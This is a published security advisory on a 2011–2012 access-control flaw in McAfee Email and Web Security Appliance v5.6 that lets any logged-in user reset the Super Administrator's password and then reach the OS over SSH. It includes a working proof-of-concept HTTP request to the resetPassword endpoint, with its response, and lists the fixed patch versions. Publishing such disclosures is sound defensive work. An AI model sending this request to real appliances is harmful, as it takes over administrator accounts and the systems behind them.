Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators

Summary

Name: McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
Release Date: 30 November 2012
Reference: NGS00155
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: High
Status: Published

TimeLine

Discovered:  7 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported:  4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012

Description

McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators

McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
various access control flaws meaning that any logged-in administrator can
bypass controls to reset passwords of other administrators

The exploit would enable an attacker to:

 – Having gained access to the UI (as any user level) an attacker can reset
the password of any user, including the “SuperAdministrator”
 – Having reset the SuperAdministrator password, this will enable an
attacker to enable SSH and login to the appliance operating system

Technical Details

I. VULNERABILITY

McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators

II. BACKGROUND

McAfee (Owned by Intel) is one of the worlds best known providers of IT
security products.

The McAfee Email and Web Security Appliance provides security for Email and
Web protocols, and acts as a Firewall and Gateway solution.

http://www.mcafee.com

III. DESCRIPTION

McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators

IV. PROOF OF CONCEPT

Although the product does implement basic role-based access control, this
is not enforced properly (only enforced by the visible menu system).

This means that (having gained access to the UI) an attacker can perform a
function they choose, even if it is outside the scope of the current role.

An example of this is in resetting other users passwords:

Any logged-in administrator can bypass controls to reset passwords of other
administrators. This includes resetting the password of the Super
Administrator password (without knowning an existing password)

This password change can be made by any user with an authenticated session
by making the following request with their session token.

Request:

POST /scmadmin/19320/cgi-bin/rpc/resetPassword/42 HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1)
Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/index.html
Content-Length: 58
Cookie:
SCMUserSettings=%3Dnull%26popcheck%3D1%26lang%3Den_US%26lastUser%3Dscmadmin%26last_page_id%3Dsystem_groups;
SHOW_BANNER_NOTICE=BannerShown%3D1;
ws_session=SID%3DSID%3AD3207A76-061D-4280-8A2E-8CA7FA712BB8
Pragma: no-cache
Cache-Control: no-cache

{“adminName”:”System Administrator”,”userName”:”scmadmin”}

Reponse:

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 10:59:48 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 75
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

[{“errorCode”:”0″,”jobId”:”42″},{“password”:”MXVT”,”userName”:”scmadmin”}]

This new “scmadmin” password can then be used to log into the UI as the
Super Administrator, and – enable SSH, and then also login to the operating
system as “support” via SSH (with the same password)

Fix Information

If role-based access control is implemented, it should be enforced
(otherwise it can be trivially bypassed).

Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, McAfee Email Gateway 7.0 Patch 1